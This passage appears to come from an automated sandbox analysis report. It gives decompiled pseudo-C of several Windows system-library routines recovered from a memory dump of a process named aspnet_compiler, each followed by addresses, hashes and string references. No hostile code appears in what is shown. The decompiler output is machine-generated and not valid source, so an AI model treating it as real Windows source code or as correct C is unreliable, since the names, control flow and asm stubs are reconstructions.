                          					_t48 = E01439650();
                          					if(_t48 < 0) {
                          						_t44 = 0;
                          						goto L16;
                          					}
                          					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                          						_t48 = 0xc000090b;
                          					}
                          					_t44 = 0;
                          					if(_t48 < 0) {
                          						goto L16;
                          					} else {
                          						_t17 = _t47 + 0xc; // 0xc
                          						_t38 = _t17;
                          						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                          							_t48 = 0xc000090b;
                          						}
                          						goto L13;
                          					}
                          				}
                          				_t48 = _t48 + 0xfffffff4;
                          				goto L18;
                          			}















                          0x01473893
                          0x01473896
                          0x01473899
                          0x0147389f
                          0x014738a0
                          0x014738a4
                          0x014738a9
                          0x014738ac
                          0x014738ad
                          0x014738ae
                          0x014738af
                          0x014738b1
                          0x014738b4
                          0x014738bb
                          0x014738bc
                          0x014738bd
                          0x014738c4
                          0x014738c8
                          0x014738ca
                          0x014738ca
                          0x014738d5
                          0x0147393e
                          0x01473940
                          0x01473942
                          0x01473952
                          0x01473954
                          0x01473961
                          0x01473961
                          0x01473967
                          0x0147396e
                          0x0147396e
                          0x01473947
                          0x0147394c
                          0x00000000
                          0x0147394c
                          0x014738ea
                          0x014738ee
                          0x014738f8
                          0x014738f9
                          0x014738ff
                          0x01473900
                          0x01473902
                          0x01473903
                          0x0147390b
                          0x0147390f
                          0x01473950
                          0x00000000
                          0x01473950
                          0x01473915
                          0x0147391d
                          0x0147391d
                          0x01473922
                          0x01473926
                          0x00000000
                          0x01473928
                          0x0147392b
                          0x0147392b
                          0x01473935
                          0x01473937
                          0x01473937
                          0x00000000
                          0x01473935
                          0x01473926
                          0x014738f0
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: BinaryName
                          • API String ID: 0-215506332
                          • Opcode ID: 9c28961af260cdd450728874367a84b5d4fb1f31fc3f877bbfcc505cdb5d7db9
                          • Instruction ID: 03bb5f143169c1d2e6e868b0c0de07cf318b2175b57ffc94d21f45acf625095a
                          • Opcode Fuzzy Hash: 9c28961af260cdd450728874367a84b5d4fb1f31fc3f877bbfcc505cdb5d7db9
                          • Instruction Fuzzy Hash: 543105B290150AEFDB15DE59C945DBBBB74FB90B20F01416AE914A73A0D7309E04D7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 33%
                          			E0142D294(void* __ecx, char __edx, void* __eflags) {
                          				signed int _v8;
                          				char _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				intOrPtr _v64;
                          				char* _v68;
                          				intOrPtr _v72;
                          				char _v76;
                          				signed int _v84;
                          				intOrPtr _v88;
                          				char _v92;
                          				intOrPtr _v96;
                          				intOrPtr _v100;
                          				char _v104;
                          				char _v105;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed int _t35;
                          				char _t38;
                          				signed int _t40;
                          				signed int _t44;
                          				signed int _t52;
                          				void* _t53;
                          				void* _t55;
                          				void* _t61;
                          				intOrPtr _t62;
                          				void* _t64;
                          				signed int _t65;
                          				signed int _t66;
                          
                          				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                          				_v8 =  *0x14ed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                          				_v105 = __edx;
                          				_push( &_v92);
                          				_t52 = 0;
                          				_push(0);
                          				_push(0);
                          				_push( &_v104);
                          				_push(0);
                          				_t59 = __ecx;
                          				_t55 = 2;
                          				if(E01414120(_t55, __ecx) < 0) {
                          					_t35 = 0;
                          					L8:
                          					_pop(_t61);
                          					_pop(_t64);
                          					_pop(_t53);
                          					return E0143B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                          				}
                          				_v96 = _v100;
                          				_t38 = _v92;
                          				if(_t38 != 0) {
                          					_v104 = _t38;
                          					_v100 = _v88;
                          					_t40 = _v84;
                          				} else {
                          					_t40 = 0;
                          				}
                          				_v72 = _t40;
                          				_v68 =  &_v104;
                          				_push( &_v52);
                          				_v76 = 0x18;
                          				_push( &_v76);
                          				_v64 = 0x40;
                          				_v60 = _t52;
                          				_v56 = _t52;
                          				_t44 = E014398D0();
                          				_t62 = _v88;
                          				_t65 = _t44;
                          				if(_t62 != 0) {
                          					asm("lock xadd [edi], eax");
                          					if((_t44 | 0xffffffff) != 0) {
                          						goto L4;
                          					}
                          					_push( *((intOrPtr*)(_t62 + 4)));
                          					E014395D0();
                          					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                          					goto L4;
                          				} else {
                          					L4:
                          					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                          					if(_t65 >= 0) {
                          						_t52 = 1;
                          					} else {
                          						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                          							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                          						}
                          					}
                          					_t35 = _t52;
                          					goto L8;
                          				}
                          			}

































                          0x0142d29c
                          0x0142d2a6
                          0x0142d2b1
                          0x0142d2b5
                          0x0142d2b6
                          0x0142d2bc
                          0x0142d2bd
                          0x0142d2be
                          0x0142d2bf
                          0x0142d2c2
                          0x0142d2c4
                          0x0142d2cc
                          0x0142d384
                          0x0142d34b
                          0x0142d34f
                          0x0142d350
                          0x0142d351
                          0x0142d35c
                          0x0142d35c
                          0x0142d2d6
                          0x0142d2da
                          0x0142d2e1
                          0x0142d361
                          0x0142d369
                          0x0142d36d
                          0x0142d2e3
                          0x0142d2e3
                          0x0142d2e3
                          0x0142d2e5
                          0x0142d2ed
                          0x0142d2f5
                          0x0142d2fa
                          0x0142d302
                          0x0142d303
                          0x0142d30b
                          0x0142d30f
                          0x0142d313
                          0x0142d318
                          0x0142d31c
                          0x0142d320
                          0x0142d379
                          0x0142d37d
                          0x00000000
                          0x00000000
                          0x0146affe
                          0x0146b001
                          0x0146b011
                          0x00000000
                          0x0142d322
                          0x0142d322
                          0x0142d330
                          0x0142d337
                          0x0142d35d
                          0x0142d339
                          0x0142d33f
                          0x0142d38c
                          0x0142d38c
                          0x0142d33f
                          0x0142d349
                          0x00000000
                          0x0142d349

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 58793c4b78dec229d5bde1734c3a7d03f20bf17192e0922f0b0f722bdcd71dea
                          • Instruction ID: 3fcc6f43a1365a886856e4e41a4e6bd4900f7aadd807d63849392880b14212d7
                          • Opcode Fuzzy Hash: 58793c4b78dec229d5bde1734c3a7d03f20bf17192e0922f0b0f722bdcd71dea
                          • Instruction Fuzzy Hash: 2331BFB29083159FC321DFA9C880A6BBBE8FBD9754F40092FF99483260D634DD45CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E01401B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                          				intOrPtr _v8;
                          				char _v16;
                          				intOrPtr* _t26;
                          				intOrPtr _t29;
                          				void* _t30;
                          				signed int _t31;
                          
                          				_t27 = __ecx;
                          				_t29 = __edx;
                          				_t31 = 0;
                          				_v8 = __edx;
                          				if(__edx == 0) {
                          					L18:
                          					_t30 = 0xc000000d;
                          					goto L12;
                          				} else {
                          					_t26 = _a4;
                          					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                          						goto L18;
                          					} else {
                          						E0143BB40(__ecx,  &_v16, __ecx);
                          						_push(_t26);
                          						_push(0);
                          						_push(0);
                          						_push(_t29);
                          						_push( &_v16);
                          						_t30 = E0143A9B0();
                          						if(_t30 >= 0) {
                          							_t19 =  *_t26;
                          							if( *_t26 != 0) {
                          								goto L7;
                          							} else {
                          								 *_a8 =  *_a8 & 0;
                          							}
                          						} else {
                          							if(_t30 != 0xc0000023) {
                          								L9:
                          								_push(_t26);
                          								_push( *_t26);
                          								_push(_t31);
                          								_push(_v8);
                          								_push( &_v16);
                          								_t30 = E0143A9B0();
                          								if(_t30 < 0) {
                          									L12:
                          									if(_t31 != 0) {
                          										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                          									}
                          								} else {
                          									 *_a8 = _t31;
                          								}
                          							} else {
                          								_t19 =  *_t26;
                          								if( *_t26 == 0) {
                          									_t31 = 0;
                          								} else {
                          									L7:
                          									_t31 = L01414620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                          								}
                          								if(_t31 == 0) {
                          									_t30 = 0xc0000017;
                          								} else {
                          									goto L9;
                          								}
                          							}
                          						}
                          					}
                          				}
                          				return _t30;
                          			}









                          0x01401b8f
                          0x01401b9a
                          0x01401b9c
                          0x01401b9e
                          0x01401ba3
                          0x01457010
                          0x01457010
                          0x00000000
                          0x01401ba9
                          0x01401ba9
                          0x01401bae
                          0x00000000
                          0x01401bc5
                          0x01401bca
                          0x01401bcf
                          0x01401bd0
                          0x01401bd1
                          0x01401bd2
                          0x01401bd6
                          0x01401bdc
                          0x01401be0
                          0x01456ffc
                          0x01457000
                          0x00000000
                          0x01457006
                          0x01457009
                          0x01457009
                          0x01401be6
                          0x01401bec
                          0x01401c0b
                          0x01401c0b
                          0x01401c0c
                          0x01401c11
                          0x01401c12
                          0x01401c15
                          0x01401c1b
                          0x01401c1f
                          0x01401c31
                          0x01401c33
                          0x01457026
                          0x01457026
                          0x01401c21
                          0x01401c24
                          0x01401c24
                          0x01401bee
                          0x01401bee
                          0x01401bf2
                          0x01401c3a
                          0x01401bf4
                          0x01401bf4
                          0x01401c05
                          0x01401c05
                          0x01401c09
                          0x01401c3e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01401c09
                          0x01401bec
                          0x01401be0
                          0x01401bae
                          0x01401c2e

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: WindowsExcludedProcs
                          • API String ID: 0-3583428290
                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                          • Instruction ID: f571d8d8fa5e30ec05345cc0f6e0826fa4a573354aa0d47ea463e68e267de3db
                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                          • Instruction Fuzzy Hash: D121F57A504229ABDB239E5A8840F5BBBADEF94F51F164437FE049B360D630DC0197A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0141F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                          				intOrPtr _t13;
                          				intOrPtr _t14;
                          				signed int _t16;
                          				signed char _t17;
                          				intOrPtr _t19;
                          				intOrPtr _t21;
                          				intOrPtr _t23;
                          				intOrPtr* _t25;
                          
                          				_t25 = _a8;
                          				_t17 = __ecx;
                          				if(_t25 == 0) {
                          					_t19 = 0xc00000f2;
                          					L8:
                          					return _t19;
                          				}
                          				if((__ecx & 0xfffffffe) != 0) {
                          					_t19 = 0xc00000ef;
                          					goto L8;
                          				}
                          				_t19 = 0;
                          				 *_t25 = 0;
                          				_t21 = 0;
                          				_t23 = "Actx ";
                          				if(__edx != 0) {
                          					if(__edx == 0xfffffffc) {
                          						L21:
                          						_t21 = 0x200;
                          						L5:
                          						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                          						 *_t25 = _t13;
                          						L6:
                          						if(_t13 == 0) {
                          							if((_t17 & 0x00000001) != 0) {
                          								 *_t25 = _t23;
                          							}
                          						}
                          						L7:
                          						goto L8;
                          					}
                          					if(__edx == 0xfffffffd) {
                          						 *_t25 = _t23;
                          						_t13 = _t23;
                          						goto L6;
                          					}
                          					_t13 =  *((intOrPtr*)(__edx + 0x10));
                          					 *_t25 = _t13;
                          					L14:
                          					if(_t21 == 0) {
                          						goto L6;
                          					}
                          					goto L5;
                          				}
                          				_t14 = _a4;
                          				if(_t14 != 0) {
                          					_t16 =  *(_t14 + 0x14) & 0x00000007;
                          					if(_t16 <= 1) {
                          						_t21 = 0x1f8;
                          						_t13 = 0;
                          						goto L14;
                          					}
                          					if(_t16 == 2) {
                          						goto L21;
                          					}
                          					if(_t16 != 4) {
                          						_t19 = 0xc00000f0;
                          						goto L7;
                          					}
                          					_t13 = 0;
                          					goto L6;
                          				} else {
                          					_t21 = 0x1f8;
                          					goto L5;
                          				}
                          			}











                          0x0141f71d
                          0x0141f722
                          0x0141f726
                          0x01464770
                          0x0141f765
                          0x0141f769
                          0x0141f769
                          0x0141f732
                          0x0146477a
                          0x00000000
                          0x0146477a
                          0x0141f738
                          0x0141f73a
                          0x0141f73c
                          0x0141f73f
                          0x0141f746
                          0x0141f778
                          0x0141f7a9
                          0x0141f7a9
                          0x0141f754
                          0x0141f75a
                          0x0141f75d
                          0x0141f75f
                          0x0141f761
                          0x0141f76f
                          0x0141f771
                          0x0141f771
                          0x0141f76f
                          0x0141f763
                          0x00000000
                          0x0141f763
                          0x0141f77d
                          0x0141f7a3
                          0x0141f7a5
                          0x00000000
                          0x0141f7a5
                          0x0141f77f
                          0x0141f782
                          0x0141f784
                          0x0141f786
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0141f788
                          0x0141f748
                          0x0141f74d
                          0x0141f78d
                          0x0141f793
                          0x0141f7b7
                          0x0141f7bc
                          0x00000000
                          0x0141f7bc
                          0x0141f798
                          0x00000000
                          0x00000000
                          0x0141f79d
                          0x0141f7b0
                          0x00000000
                          0x0141f7b0
                          0x0141f79f
                          0x00000000
                          0x0141f74f
                          0x0141f74f
                          0x00000000
                          0x0141f74f

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: Actx
                          • API String ID: 0-89312691
                          • Opcode ID: 255266b5038c1acd727a985e7b6cdc6747a73355729ecd8dfe30baf511784694
                          • Instruction ID: f497714ca712dcb266229f67a913aa1b4125e807c20c15c668efbb64c455988e
                          • Opcode Fuzzy Hash: 255266b5038c1acd727a985e7b6cdc6747a73355729ecd8dfe30baf511784694
                          • Instruction Fuzzy Hash: 401101393047028BFB254E1C8890737769AEB86224F28453BE476CB3B9DB70D80F8341
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E014A8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _t35;
                          				void* _t41;
                          
                          				_t40 = __esi;
                          				_t39 = __edi;
                          				_t38 = __edx;
                          				_t35 = __ecx;
                          				_t34 = __ebx;
                          				_push(0x74);
                          				_push(0x14d0d50);
                          				E0144D0E8(__ebx, __edi, __esi);
                          				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                          				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                          				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                          					E01485720(0x65, 0, "Critical error detected %lx\n", _t35);
                          					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                          						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                          						asm("int3");
                          						 *(_t41 - 4) = 0xfffffffe;
                          					}
                          				}
                          				 *(_t41 - 4) = 1;
                          				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                          				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                          				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                          				 *((intOrPtr*)(_t41 - 0x64)) = L0144DEF0;
                          				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                          				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                          				_push(_t41 - 0x70);
                          				L0144DEF0(1, _t38);
                          				 *(_t41 - 4) = 0xfffffffe;
                          				return E0144D130(_t34, _t39, _t40);
                          			}





                          0x014a8df1
                          0x014a8df1
                          0x014a8df1
                          0x014a8df1
                          0x014a8df1
                          0x014a8df1
                          0x014a8df3
                          0x014a8df8
                          0x014a8dfd
                          0x014a8e00
                          0x014a8e0e
                          0x014a8e2a
                          0x014a8e36
                          0x014a8e38
                          0x014a8e3c
                          0x014a8e46
                          0x014a8e46
                          0x014a8e36
                          0x014a8e50
                          0x014a8e56
                          0x014a8e59
                          0x014a8e5c
                          0x014a8e60
                          0x014a8e67
                          0x014a8e6d
                          0x014a8e73
                          0x014a8e74
                          0x014a8eb1
                          0x014a8ebd

                          Strings
                          • Critical error detected %lx, xrefs: 014A8E21
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: Critical error detected %lx
                          • API String ID: 0-802127002
                          • Opcode ID: d2d9e16d40599ecfe08d2098d1cfe27f33a4c1f7a56a917b51c5107e5aefe0d7
                          • Instruction ID: 985e5aea85481a54f608ab3a94c95152bdfd8b5d19e11787f135b035e097d28e
                          • Opcode Fuzzy Hash: d2d9e16d40599ecfe08d2098d1cfe27f33a4c1f7a56a917b51c5107e5aefe0d7
                          • Instruction Fuzzy Hash: F7117C71D00349DBEF24DFA9850579EBBB0EB24325F20411ED659AB3A1C3300602CF14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0148FF60
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                          • API String ID: 0-1911121157
                          • Opcode ID: aca9eeea3f45de16a7c1563977060f452f02b8e344d0e8bd2363cb68583926ec
                          • Instruction ID: 6ab3fffe02768683f7ab8eb560a535a1162fb5fdbcc3349c06b04ad0fd0cab3c
                          • Opcode Fuzzy Hash: aca9eeea3f45de16a7c1563977060f452f02b8e344d0e8bd2363cb68583926ec
                          • Instruction Fuzzy Hash: 6711C471910144EFEB22EB54C958F9DBBF1FF24715F14805AF6046B2B1C7399954CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E014C5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                          				signed int _t296;
                          				signed char _t298;
                          				signed int _t301;
                          				signed int _t306;
                          				signed int _t310;
                          				signed char _t311;
                          				intOrPtr _t312;
                          				signed int _t313;
                          				void* _t327;
                          				signed int _t328;
                          				intOrPtr _t329;
                          				intOrPtr _t333;
                          				signed char _t334;
                          				signed int _t336;
                          				void* _t339;
                          				signed int _t340;
                          				signed int _t356;
                          				signed int _t362;
                          				short _t367;
                          				short _t368;
                          				short _t373;
                          				signed int _t380;
                          				void* _t382;
                          				short _t385;
                          				signed short _t392;
                          				signed char _t393;
                          				signed int _t395;
                          				signed char _t397;
                          				signed int _t398;
                          				signed short _t402;
                          				void* _t406;
                          				signed int _t412;
                          				signed char _t414;
                          				signed short _t416;
                          				signed int _t421;
                          				signed char _t427;
                          				intOrPtr _t434;
                          				signed char _t435;
                          				signed int _t436;
                          				signed int _t442;
                          				signed int _t446;
                          				signed int _t447;
                          				signed int _t451;
                          				signed int _t453;
                          				signed int _t454;
                          				signed int _t455;
                          				intOrPtr _t456;
                          				intOrPtr* _t457;
                          				short _t458;
                          				signed short _t462;
                          				signed int _t469;
                          				intOrPtr* _t474;
                          				signed int _t475;
                          				signed int _t479;
                          				signed int _t480;
                          				signed int _t481;
                          				short _t485;
                          				signed int _t491;
                          				signed int* _t494;
                          				signed int _t498;
                          				signed int _t505;
                          				intOrPtr _t506;
                          				signed short _t508;
                          				signed int _t511;
                          				void* _t517;
                          				signed int _t519;
                          				signed int _t522;
                          				void* _t523;
                          				signed int _t524;
                          				void* _t528;
                          				signed int _t529;
                          
                          				_push(0xd4);
                          				_push(0x14d1178);
                          				E0144D0E8(__ebx, __edi, __esi);
                          				_t494 = __edx;
                          				 *(_t528 - 0xcc) = __edx;
                          				_t511 = __ecx;
                          				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                          				 *(_t528 - 0xbc) = __ecx;
                          				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                          				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                          				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                          				_t427 = 0;
                          				 *(_t528 - 0x74) = 0;
                          				 *(_t528 - 0x9c) = 0;
                          				 *(_t528 - 0x84) = 0;
                          				 *(_t528 - 0xac) = 0;
                          				 *(_t528 - 0x88) = 0;
                          				 *(_t528 - 0xa8) = 0;
                          				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                          				if( *(_t528 + 0x1c) <= 0x80) {
                          					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                          					if(__eflags != 0) {
                          						_t421 = E014C4C56(0, __edx, __ecx, __eflags);
                          						__eflags = _t421;
                          						if(_t421 != 0) {
                          							 *((intOrPtr*)(_t528 - 4)) = 0;
                          							E0143D000(0x410);
                          							 *(_t528 - 0x18) = _t529;
                          							 *(_t528 - 0x9c) = _t529;
                          							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                          							E014C5542(_t528 - 0x9c, _t528 - 0x84);
                          						}
                          					}
                          					_t435 = _t427;
                          					 *(_t528 - 0xd0) = _t435;
                          					_t474 = _t511 + 0x65;
                          					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                          					_t511 = 0x18;
                          					while(1) {
                          						 *(_t528 - 0xa0) = _t427;
                          						 *(_t528 - 0xbc) = _t427;
                          						 *(_t528 - 0x80) = _t427;
                          						 *(_t528 - 0x78) = 0x50;
                          						 *(_t528 - 0x79) = _t427;
                          						 *(_t528 - 0x7a) = _t427;
                          						 *(_t528 - 0x8c) = _t427;
                          						 *(_t528 - 0x98) = _t427;
                          						 *(_t528 - 0x90) = _t427;
                          						 *(_t528 - 0xb0) = _t427;
                          						 *(_t528 - 0xb8) = _t427;
                          						_t296 = 1 << _t435;
                          						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                          						__eflags = _t436 & _t296;
                          						if((_t436 & _t296) != 0) {
                          							goto L92;
                          						}
                          						__eflags =  *((char*)(_t474 - 1));
                          						if( *((char*)(_t474 - 1)) == 0) {
                          							goto L92;
                          						}
                          						_t301 =  *_t474;
                          						__eflags = _t494[1] - _t301;
                          						if(_t494[1] <= _t301) {
                          							L10:
                          							__eflags =  *(_t474 - 5) & 0x00000040;
                          							if(( *(_t474 - 5) & 0x00000040) == 0) {
                          								L12:
                          								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                          								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                          									goto L92;
                          								}
                          								_t442 =  *(_t474 - 0x11) & _t494[3];
                          								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                          								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                          									goto L92;
                          								}
                          								__eflags = _t442 -  *(_t474 - 0x11);
                          								if(_t442 !=  *(_t474 - 0x11)) {
                          									goto L92;
                          								}
                          								L15:
                          								_t306 =  *(_t474 + 1) & 0x000000ff;
                          								 *(_t528 - 0xc0) = _t306;
                          								 *(_t528 - 0xa4) = _t306;
                          								__eflags =  *0x14e60e8;
                          								if( *0x14e60e8 != 0) {
                          									__eflags = _t306 - 0x40;
                          									if(_t306 < 0x40) {
                          										L20:
                          										asm("lock inc dword [eax]");
                          										_t310 =  *0x14e60e8; // 0x0
                          										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                          										__eflags = _t311 & 0x00000001;
                          										if((_t311 & 0x00000001) == 0) {
                          											 *(_t528 - 0xa0) = _t311;
                          											_t475 = _t427;
                          											 *(_t528 - 0x74) = _t427;
                          											__eflags = _t475;
                          											if(_t475 != 0) {
                          												L91:
                          												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                          												goto L92;
                          											}
                          											asm("sbb edi, edi");
                          											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                          											_t511 = _t498;
                          											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                          											__eflags =  *(_t312 - 5) & 1;
                          											if(( *(_t312 - 5) & 1) != 0) {
                          												_push(_t528 - 0x98);
                          												_push(0x4c);
                          												_push(_t528 - 0x70);
                          												_push(1);
                          												_push(0xfffffffa);
                          												_t412 = E01439710();
                          												_t475 = _t427;
                          												__eflags = _t412;
                          												if(_t412 >= 0) {
                          													_t414 =  *(_t528 - 0x98) - 8;
                          													 *(_t528 - 0x98) = _t414;
                          													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                          													 *(_t528 - 0x8c) = _t416;
                          													 *(_t528 - 0x79) = 1;
                          													_t511 = (_t416 & 0x0000ffff) + _t498;
                          													__eflags = _t511;
                          												}
                          											}
                          											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                          											__eflags = _t446 & 0x00000004;
                          											if((_t446 & 0x00000004) != 0) {
                          												__eflags =  *(_t528 - 0x9c);
                          												if( *(_t528 - 0x9c) != 0) {
                          													 *(_t528 - 0x7a) = 1;
                          													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                          													__eflags = _t511;
                          												}
                          											}
                          											_t313 = 2;
                          											_t447 = _t446 & _t313;
                          											__eflags = _t447;
                          											 *(_t528 - 0xd4) = _t447;
                          											if(_t447 != 0) {
                          												_t406 = 0x10;
                          												_t511 = _t511 + _t406;
                          												__eflags = _t511;
                          											}
                          											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                          											 *(_t528 - 0x88) = _t427;
                          											__eflags =  *(_t528 + 0x1c);
                          											if( *(_t528 + 0x1c) <= 0) {
                          												L45:
                          												__eflags =  *(_t528 - 0xb0);
                          												if( *(_t528 - 0xb0) != 0) {
                          													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                          													__eflags = _t511;
                          												}
                          												__eflags = _t475;
                          												if(_t475 != 0) {
                          													asm("lock dec dword [ecx+edx*8+0x4]");
                          													goto L100;
                          												} else {
                          													_t494[3] = _t511;
                          													_t451 =  *(_t528 - 0xa0);
                          													_t427 = E01436DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                          													 *(_t528 - 0x88) = _t427;
                          													__eflags = _t427;
                          													if(_t427 == 0) {
                          														__eflags = _t511 - 0xfff8;
                          														if(_t511 <= 0xfff8) {
                          															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                          															asm("sbb ecx, ecx");
                          															__eflags = (_t451 & 0x000000e2) + 8;
                          														}
                          														asm("lock dec dword [eax+edx*8+0x4]");
                          														L100:
                          														goto L101;
                          													}
                          													_t453 =  *(_t528 - 0xa0);
                          													 *_t494 = _t453;
                          													_t494[1] = _t427;
                          													_t494[2] =  *(_t528 - 0xbc);
                          													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                          													 *_t427 =  *(_t453 + 0x24) | _t511;
                          													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                          													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                          													asm("movsd");
                          													asm("movsd");
                          													asm("movsd");
                          													asm("movsd");
                          													asm("movsd");
                          													asm("movsd");
                          													asm("movsd");
                          													asm("movsd");
                          													__eflags =  *(_t528 + 0x14);
                          													if( *(_t528 + 0x14) == 0) {
                          														__eflags =  *[fs:0x18] + 0xf50;
                          													}
                          													asm("movsd");
                          													asm("movsd");
                          													asm("movsd");
                          													asm("movsd");
                          													__eflags =  *(_t528 + 0x18);
                          													if( *(_t528 + 0x18) == 0) {
                          														_t454 =  *(_t528 - 0x80);
                          														_t479 =  *(_t528 - 0x78);
                          														_t327 = 1;
                          														__eflags = 1;
                          													} else {
                          														_t146 = _t427 + 0x50; // 0x50
                          														_t454 = _t146;
                          														 *(_t528 - 0x80) = _t454;
                          														_t382 = 0x18;
                          														 *_t454 = _t382;
                          														 *((short*)(_t454 + 2)) = 1;
                          														_t385 = 0x10;
